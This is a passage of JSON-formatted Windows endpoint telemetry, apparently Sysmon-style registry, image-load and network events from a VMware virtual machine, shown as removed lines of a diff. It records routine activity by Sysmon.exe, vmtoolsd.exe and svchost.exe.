"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570917460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "cldapi.dll", - "image_path": "C:\\Windows\\System32\\cldapi.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570917310016, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570918090000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570918090000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570918090000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "destination_address": "151.101.48.133", - "destination_port": "443", - "event_type": "network", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "protocol": "tcp", - "source_address": "192.168.162.134", - "source_port": "50502", - "subtype": "outgoing", - "timestamp": 131883570903820000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}", - "user": "NT AUTHORITY\\SYSTEM", - "user_domain": "NT AUTHORITY", - "user_name": "SYSTEM" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.FileExplorer_cw5n1h2txyewy%5Cresources.pri", - "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.FileExplorer_cw5n1h2txyewy%5Cresources.pri", - "timestamp": 131883570920590000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.FileExplorer_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed8e22c573\\a01460c8", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.FileExplorer_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed8e22c573\\a01460c8\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570920590000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.AAD.BrokerPlugin_cw5n1h2txyewy%5Cresources.pri", - "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.AAD.BrokerPlugin_cw5n1h2txyewy%5Cresources.pri", - "timestamp": 131883570922619984, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.AAD.BrokerPlugin_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed97d4ea1b\\a01460c8", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.AAD.BrokerPlugin_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed97d4ea1b\\a01460c8\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570922619984, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingFinance_4.26.12334.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-0.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingFinance_4.26.12334.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-0.pri", - "timestamp": 131883570923090000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingFinance_4.26.12334.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-0.pri\\1d48b5dcbcf231a\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingFinance_4.26.12334.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-0.pri\\1d48b5dcbcf231a\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570923090000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingNews_4.27.2643.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingNews_4.27.2643.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", - "timestamp": 131883570923400000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingNews_4.27.2643.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5da1da56ec\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingNews_4.27.2643.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5da1da56ec\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570923400000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingSports_4.25.11802.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingSports_4.25.11802.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", - "timestamp": 131883570923710000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingSports_4.25.11802.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5d8fe5a311\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingSports_4.25.11802.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5d8fe5a311\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570923710000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingWeather_4.26.12153.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingWeather_4.26.12153.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", - "timestamp": 131883570924030000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingWeather_4.26.12153.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5cb01d6579\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingWeather_4.26.12153.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5cb01d6579\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570924030000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.CommsPhone_3.43.20002.1000_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.CommsPhone_3.43.20002.1000_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", - "timestamp": 131883570924650000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.CommsPhone_3.43.20002.1000_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5c8b754811\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.CommsPhone_3.43.20002.1000_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5c8b754811\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570924650000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.DesktopAppInstaller_1.0.20921.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.DesktopAppInstaller_1.0.20921.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri", - "timestamp": 131883570925119984, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.DesktopAppInstaller_1.0.20921.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri\\1d48b5db8214a55\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.DesktopAppInstaller_1.0.20921.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri\\1d48b5db8214a55\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570925119984, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.GetHelp_10.1706.12921.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.GetHelp_10.1706.12921.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri", - "timestamp": 131883570925280000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.GetHelp_10.1706.12921.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri\\1d48b5c95cbb64f\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.GetHelp_10.1706.12921.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri\\1d48b5c95cbb64f\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570925280000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Getstarted_6.15.12641.0_x64__8wekyb3d8bbwe%5Cresources.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Getstarted_6.15.12641.0_x64__8wekyb3d8bbwe%5Cresources.pri", - "timestamp": 131883570925590000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Getstarted_6.15.12641.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5d36ffbc8b\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Getstarted_6.15.12641.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5d36ffbc8b\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570925590000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": 